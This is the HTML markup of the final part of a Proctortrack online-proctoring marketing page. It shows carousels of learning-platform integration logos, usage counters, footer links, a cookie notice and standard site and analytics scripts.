tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 100%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/canvas_logo-uai-258x258.png" width="258" height="258" alt="remote worker continuous proctoring identity security remote worker continuous proctoring identity security" data-uniqueid="805-105707" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/canvas_logo.png" data-path="2017/02/canvas_logo.png" data-width="360" data-height="360" data-singlew="1.3333333333333" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 35.27%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/desire2learn_logo-copy-1024x360-uai-258x91.png" width="258" height="91" alt="remote worker continuous proctoring identity security remote worker continuous proctoring identity security" data-uniqueid="799-140936" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/desire2learn_logo-copy-1024x360.png" data-path="2017/02/desire2learn_logo-copy-1024x360.png" data-width="1024" data-height="360" data-singlew="1.3333333333333" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 61.24%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/open-edx-logo-uai-258x158.png" width="258" height="158" alt="continuous proctoring identity security remote worker continuous proctoring identity security proctored exam online proctoring" data-uniqueid="912-602727" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/open-edx-logo.png" data-path="2017/02/open-edx-logo.png" data-width="588" data-height="360" data-singlew="1.3333333333333" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div> </div> </div> </div></div></div></div></div></div><script id="script-575815" type="text/javascript">UNCODE.initRow(document.getElementById("script-575815"));</script></div></div></div><div data-parent="true" class="row-container onepage-section desktop-hidden tablet-hidden" data-label="Integrations" data-name="integrations"><div class="row full-width row-parent" data-height-ratio="2" data-minheight="30"><div class="row-inner"><div class="pos-top pos-center align_left column_parent col-lg-12 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="owl-carousel-wrapper"> <div class="owl-carousel-container owl-carousel-loading px-gutter"> <div id="gallery-100618" class="owl-carousel owl-element owl-valign-middle owl-height-auto" data-fade="true" data-navmobile="false" data-navspeed="0" data-autoplay="false" data-lg="6" data-md="6" data-sm="6"> <div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 61.24%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/moodle_logo-1-uai-258x158.png" width="258" height="158" alt="proctortrack and moodle remote worker continuous proctoring identity security remote worker continuous proctoring identity security" data-uniqueid="809-165493" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/moodle_logo-1.png" data-path="2017/02/moodle_logo-1.png" data-width="588" data-height="360" data-singlew="2" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 77.13%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/flat_world_knowledge-1-uai-258x199.png" width="258" height="199" alt="proctortrack identity verification remote worker continuous proctoring identity security remote worker continuous proctoring identity security" data-uniqueid="817-996223" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/flat_world_knowledge-1.png" data-path="2017/02/flat_world_knowledge-1.png" data-width="466" data-height="360" data-singlew="2" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 77.52%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/blackboard_logo-1-uai-258x200.png" width="258" height="200" alt="proctortrack identity verification" data-uniqueid="821-153041" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/blackboard_logo-1.png" data-path="2017/02/blackboard_logo-1.png" data-width="465" data-height="360" data-singlew="2" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 138.46%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img src="https://www.proctortrack.com/wp-content/uploads/2017/02/angel_learning_logo.gif" width="260" height="360" alt="proctortrack identity verification" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 119.77%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/edx_logo_square-1-uai-258x309.png" width="258" height="309" alt="remote worker continuous proctoring identity security remote worker continuous proctoring identity security" data-uniqueid="813-116646" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/edx_logo_square-1.png" data-path="2017/02/edx_logo_square-1.png" data-width="301" data-height="360" data-singlew="2" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 101.55%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/ecollege_logo-1-uai-258x262.png" width="258" height="262" alt="remote worker continuous proctoring identity security remote worker continuous proctoring identity security" data-uniqueid="825-594091" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/ecollege_logo-1.png" data-path="2017/02/ecollege_logo-1.png" data-width="354" data-height="360" data-singlew="2" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 100%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/canvas_logo-uai-258x258.png" width="258" height="258" alt="remote worker continuous proctoring identity security remote worker continuous proctoring identity security" data-uniqueid="805-190762" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/canvas_logo.png" data-path="2017/02/canvas_logo.png" data-width="360" data-height="360" data-singlew="2" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 35.27%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/desire2learn_logo-copy-1024x360-uai-258x91.png" width="258" height="91" alt="remote worker continuous proctoring identity security remote worker continuous proctoring identity security" data-uniqueid="799-120050" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/desire2learn_logo-copy-1024x360.png" data-path="2017/02/desire2learn_logo-copy-1024x360.png" data-width="1024" data-height="360" data-singlew="2" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div><div class="tmb tmb-carousel tmb-iso-h4 tmb-dark tmb-overlay-anim tmb-overlay-text-reduced tmb-overlay-left tmb-overlay-middle tmb-overlay-text-left tmb-text-space-reduced tmb-desaturated tmb-image-anim tmb-media-first tmb-media-last tmb-content-overlay"> <div class="t-inside style-color-xsdn-bg animate_when_almost_visible right-t-left" ><div class="t-entry-visual" tabindex="0"><div class="t-entry-visual-tc"><div class="t-entry-visual-cont"><div class="dummy" style="padding-top: 61.24%;"></div><a tabindex="-1" href="#" class="inactive-link pushed"><div class="t-entry-visual-overlay"><div class="t-entry-visual-overlay-in style-light-bg" style="opacity: 0.5;"></div></div> <div class="t-overlay-wrap"> <div class="t-overlay-inner"> <div class="t-overlay-content"> <div class="t-overlay-text no-block-padding"></div></div></div></div><img class="adaptive-async" src="https://www.proctortrack.com/wp-content/uploads/2017/02/open-edx-logo-uai-258x158.png" width="258" height="158" alt="continuous proctoring identity security remote worker continuous proctoring identity security proctored exam online proctoring" data-uniqueid="912-191230" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/open-edx-logo.png" data-path="2017/02/open-edx-logo.png" data-width="588" data-height="360" data-singlew="2" data-singleh="4" data-crop="" data-fixed="" /></a></div> </div> </div></div> </div> </div> </div> </div></div></div></div></div></div><script id="script-965345" type="text/javascript">UNCODE.initRow(document.getElementById("script-965345"));</script></div></div></div><div data-parent="true" class="style-color-lxmt-bg vc_custom_1490736135542 border-color-gyho-color row-container with-parallax"><div class="row-background background-element"> <div class="background-wrapper"> <div class="background-inner adaptive-async" style="background-image: url(https://www.proctortrack.com/wp-content/uploads/2017/02/Marcela_Landing_cut-1024x508-uai-258x128.jpg);background-repeat: no-repeat;background-position: center center;background-size: cover;" data-uniqueid="466-100880" data-guid="https://www.proctortrack.com/wp-content/uploads/2017/02/Marcela_Landing_cut-1024x508.jpg" data-path="2017/02/Marcela_Landing_cut-1024x508.jpg" data-width="1024" data-height="508" data-singlew="12" data-singleh="null" data-crop=""></div> <div class="block-bg-overlay style-color-wayh-bg" style="opacity: 0.7;"></div> </div> </div><div class="row triple-top-padding triple-bottom-padding single-h-padding limit-width row-parent" data-height-ratio="50"><div class="row-inner"><div class="pos-middle pos-left align_center column_parent col-lg-3 col-md-25 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="uncode-wrapper uncode-counter " ><p class="font-762333 h3 font-weight-600"><span class="counter text-color-xsdn-color">1,717,931</span><span class="counter-suffix text-color-xsdn-color"> </span></p><div class="counter-text"><p>HAPPY USERS</p></div></div></div></div></div></div></div><div class="pos-middle pos-left align_center column_parent col-lg-3 col-md-25 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="uncode-wrapper uncode-counter " ><p class="font-762333 h3 font-weight-600 text-capitalize"><span class="counter text-color-xsdn-color">1,472,696</span></p><div class="counter-text"><p>IDENTITIES VERIFIED</p></div></div></div></div></div></div></div><div class="pos-middle pos-left align_center column_parent col-lg-3 col-md-25 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="uncode-wrapper uncode-counter " ><p class="font-762333 h3 font-weight-600"><span class="counter text-color-xsdn-color">5,511,721</span></p><div class="counter-text"><p>VIOLATIONS DETECTED </p></div></div></div></div></div></div></div><div class="pos-middle pos-left align_center column_parent col-lg-3 col-md-25 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="uncode-wrapper uncode-counter " ><p class="font-762333 h3 font-weight-600"><span class="counter text-color-xsdn-color">412,796</span></p><div class="counter-text"><p>LINES OF CODE</p></div></div></div></div></div></div></div><script id="script-150592" type="text/javascript">UNCODE.initRow(document.getElementById("script-150592"));</script></div></div></div></div><div class="post-after row-container"><div data-parent="true" class="style-color-prif-bg row-container tablet-hidden mobile-hidden"><div class="row full-width row-parent" data-height-ratio="30"><div class="row-inner"><div class="pos-top pos-center align_left column_parent col-lg-3 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"> <div class="wpb_raw_code wpb_content_element wpb_raw_html"> <div class="wpb_wrapper"> <ul class="footer" id="myfooter"> <li><a href="http://www.proctortrack.com/"><b>STUDENTS</b></a></li> <li><a href="http://www.proctortrack.com/howitworks/">HOW IT WORKS</a></li> <li><a href="http://www.proctortrack.com/tech-requirements/">TECHNICAL REQUIREMENTS</a></li> <li><a href="http://www.proctortrack.com/support/">SUPPORT</a></li> </ul> </div> </div> </div></div></div></div></div><div class="pos-top pos-center align_left column_parent col-lg-3 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"> <div class="wpb_raw_code wpb_content_element wpb_raw_html"> <div class="wpb_wrapper"> <ul class="footer" id="myfooter"> <li><a href="http://www.proctortrack.com/instructors"><b>INSTRUCTORS</b></a></li> <li><a href="http://www.proctortrack.com/instructors/howitworks">HOW IT WORKS</a></li> <li><a href="http://www.proctortrack.com/signup">SIGNUP YOUR INSTITUTION</a></li> <li><a href="http://www.proctortrack.com/support/">SUPPORT</a></li> </ul> </div> </div> </div></div></div></div></div><div class="pos-top pos-center align_left column_parent col-lg-3 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"> <div class="wpb_raw_code wpb_content_element wpb_raw_html"> <div class="wpb_wrapper"> <ul class="footer" id="myfooter"> <li><a href="http://www.proctortrack.com/institutions"><b>INSTITUTIONS</b></a></li> </ul> </div> </div> </div></div></div></div></div><div class="pos-top pos-center align_left column_parent col-lg-3 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="icon-box icon-box-top" ><div class="icon-box-icon fa-container" style="margin-bottom: 0px;"><a href="https://www.verificient.com/" class="text-default-color custom-link"><img src="https://www.proctortrack.com/wp-content/uploads/2017/02/Logo-Website-Dark-01-01-uai-258x47.png" width="258" height="47" alt="" /></a></div></div></div></div></div></div></div><script id="script-177108" type="text/javascript">UNCODE.initRow(document.getElementById("script-177108"));</script></div></div></div><div data-parent="true" class="footer style-color-prif-bg limit-width boxed-row row-container desktop-hidden mobile-hidden"><div class="row row-parent" data-height-ratio="full"><div class="row-inner"><div class="pos-top pos-center align_left column_parent col-lg-8 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="footer row-internal row-container desktop-hidden mobile-hidden"><div class="row row-child"><div class="row-inner"><div class="pos-top pos-center align_left column_child col-lg-4 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"> <div class="wpb_raw_code wpb_content_element wpb_raw_html"> <div class="wpb_wrapper"> <ul class="footer" id="myfooter"> <li><a href="http://www.proctortrack.com/institutions"><b>INSTITUTIONS</b></a></li> </ul> </div> </div> <div class="wpb_raw_code wpb_content_element wpb_raw_html"> <div class="wpb_wrapper"> <ul class="footer" id="myfooter"> <li><a href="http://www.proctortrack.com/"><b>STUDENTS</b></a></li> <li><a href="http://www.proctortrack.com/howitworks/">HOW IT WORKS</a></li> <li><a href="http://www.proctortrack.com/tech-requirements/">TECHNICAL REQUIREMENTS</a></li> <li><a href="http://www.proctortrack.com/support/">SUPPORT</a></li> </ul> </div> </div> </div></div></div></div></div><div class="pos-top pos-center align_left column_child col-lg-4 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"> <div class="wpb_raw_code wpb_content_element wpb_raw_html"> <div class="wpb_wrapper"> <ul class="footer" id="myfooter"> <li><a href="http://www.proctortrack.com/instructors"><b>INSTRUCTORS</b></a></li> <li><a href="http://www.proctortrack.com/instructors/howitworks/">HOW IT WORKS</a></li> <li><a href="http://www.proctortrack.com/signup">SIGNUP YOUR INSTITUTION</a></li> <li><a href="http://www.proctortrack.com/support/">SUPPORT</a></li> </ul> </div> </div> </div></div></div></div></div><div class="pos-top pos-center align_left column_child col-lg-4 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"></div></div></div></div></div></div></div></div></div></div></div></div></div><div class="pos-top pos-center align_left column_parent col-lg-4 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="row-internal row-container"><div class="row row-child"><div class="row-inner"><div class="pos-top pos-center align_left column_child col-lg-6 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"></div></div></div></div></div><div class="pos-top pos-center align_left column_child col-lg-6 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"><div class="icon-box icon-box-top" ><div class="icon-box-icon fa-container" style="margin-bottom: 0px;"><span class="text-default-color btn-disable-hover"><img src="https://www.proctortrack.com/wp-content/uploads/2017/02/Logo-Website-Dark-01-01-uai-258x47.png" width="258" height="47" alt="" /></span></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div><script id="script-376118" type="text/javascript">UNCODE.initRow(document.getElementById("script-376118"));</script></div></div></div><div data-parent="true" class="style-color-rgdb-bg row-container"><div class="row one-top-padding one-bottom-padding single-h-padding limit-width row-parent" data-height-ratio="10"><div class="row-inner"><div class="pos-middle pos-center align_center column_parent col-lg-12 single-internal-gutter"><div class="uncol style-light" ><div class="uncoltable"><div class="uncell no-block-padding"><div class="uncont"> <div class="wpb_raw_code wpb_content_element wpb_raw_html"> <div class="wpb_wrapper"> <ul class="footer2" id="myfooter"> <li><a href="http://www.proctortrack.com/ferpa"><b>FERPA | </b></a><a href="http://www.proctortrack.com/policies"><b>Policies | </b></a><a href="http://www.proctortrack.com/privacy"><b>Privacy</b></a></li><li><a target="_blank" href="https://www.facebook.com/verificient"><i class="fa fa-facebook"></i></a><a target="_blank" href="https://twitter.com/Verificient"><i class="fa fa-twitter"></i></a><a target="_blank" href="https://www.linkedin.com/showcase/proctortrack"><i class="fa fa-linkedin"></i></a> </li> </ul> </div> </div> </div></div></div></div></div><script id="script-487685" type="text/javascript">UNCODE.initRow(document.getElementById("script-487685"));</script></div></div></div></div></div> </div> </article> </div><!-- sections container --> </div><!-- page wrapper --> <footer id="colophon" class="site-footer"> <div class="row-container style-dark-bg footer-center footer-last"> <div class="row row-parent style-dark no-top-padding no-h-padding no-bottom-padding"> <div class="site-info uncell col-lg-6 pos-middle text-center"><div style="text-align: center;">©2013 – 2019  Verificient Technologies, Inc   </div> <div style="text-align: center;">USPTO Patent 8,926,335 – System and method for remote test administration and monitoring</div> </div><!-- site info --> </div> </div> </footer> </div><!-- main container --> </div><!-- main wrapper --> </div><!-- box container --> </div><!-- box wrapper --> <div class="style-light footer-scroll-top footer-scroll-higher"><a href="#" class="scroll-top"><i class="fa fa-angle-up fa-stack fa-rounded btn-default btn-hover-nobg"></i></a></div> <div class="overlay overlay-sequential style-dark style-dark-bg overlay-search" data-area="search" data-container="box-container"> <div class="mmb-container"><div class="menu-close-search mobile-menu-button menu-button-offcanvas mobile-menu-button-dark lines-button x2 overlay-close close" data-area="search" data-container="box-container"><span class="lines"></span></div></div> <div class="search-container"><form action="https://www.proctortrack.com/" method="get"> <div class="search-container-inner"> <input type="search" class="search-field form-fluid no-livesearch" placeholder="Search…" value="" name="s" title="Search for:"> <i class="fa fa-search3"></i> </div> </form> </div> </div> <div id="cookie-law-info-bar"><span>Verificient and its product websites use cookies. Cookies collect data about how you interact with our website, helping us to customize and improve your experience. By using this website, you accept this use. To learn more about the cookies we use, refer to our <a href='https://www.proctortrack.com/privacy' id="CONSTANT_OPEN_URL" class="cli-plugin-main-link" style="display:inline-block;" >Privacy Policy</a>.<a data-cli_action="accept" id="cookie_action_close_header" class="cli-plugin-main-button cookie_action_close_header cli_action_button" style="display:inline-block; ">X</a> </span></div><div id="cookie-law-info-again" style="display:none;"><span id="cookie_hdr_showagain">Privacy & Cookies Policy</span></div><div class="cli-modal-backdrop cli-fade cli-settings-overlay"></div> <div class="cli-modal-backdrop cli-fade cli-popupbar-overlay"></div> <script type="text/javascript"> /* <![CDATA[ */ cli_cookiebar_settings='{"animate_speed_hide":"500","animate_speed_show":"500","background":"#e9e9e9","border":"#444","border_on":false,"button_1_button_colour":"#e9e9e9","button_1_button_hover":"#bababa","button_1_link_colour":"#3097f7","button_1_as_button":false,"button_1_new_win":false,"button_2_button_colour":"#333","button_2_button_hover":"#292929","button_2_link_colour":"#3097f7","button_2_as_button":false,"button_2_hidebar":false,"button_3_button_colour":"#000","button_3_button_hover":"#000000","button_3_link_colour":"#fff","button_3_as_button":true,"button_3_new_win":false,"button_4_button_colour":"#000","button_4_button_hover":"#000000","button_4_link_colour":"#fff","button_4_as_button":true,"font_family":"inherit","header_fix":true,"notify_animate_hide":false,"notify_animate_show":false,"notify_div_id":"#cookie-law-info-bar","notify_position_horizontal":"right","notify_position_vertical":"top","scroll_close":false,"scroll_close_reload":false,"accept_close_reload":false,"reject_close_reload":false,"showagain_tab":false,"showagain_background":"#fff","showagain_border":"#000","showagain_div_id":"#cookie-law-info-again","showagain_x_position":"100px","text":"#333333","show_once_yn":false,"show_once":"10000","logging_on":false,"as_popup":false,"popup_overlay":true,"bar_heading_text":"","cookie_bar_as":"banner","popup_showagain_position":"bottom-right","widget_position":"left"}'; /* ]]> */ </script><script type="text/javascript" language="javascript"> var sf14gv = 30542; (function() { var sf14g = document.createElement('script'); sf14g.type = 'text/javascript'; sf14g.async = true; sf14g.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 't.sf14g.com/sf14g.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sf14g, s); })(); </script> <script type="text/javascript"> jQuery(document).ready(function($) { var cookieBarHt = $('#cookie-law-info-bar').outerHeight(); var checkCookieMessage = function(){ if($('#cookie-law-info-bar').is(':visible')) { $('body').css('margin-top', cookieBarHt + 'px') } else { $('body').css('margin-top', '0') } } checkCookieMessage(); $('.cookie_action_close_header').on('click', function(e){ e.preventDefault(); checkCookieMessage(); }); }); </script><script type='text/javascript' src='https://www.proctortrack.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpcf7 = {"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.proctortrack.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.6.1'></script> <script type='text/javascript' src='https://www.proctortrack.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.2'></script> <script type='text/javascript' src='https://www.proctortrack.com/wp-content/themes/uncode/library/js/plugins.js?ver=171754000'></script> <script type='text/javascript' src='https://www.proctortrack.com/wp-content/themes/uncode/library/js/app.js?ver=171754000'></script> <script type='text/javascript' src='https://www.proctortrack.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> </body> </html>
0
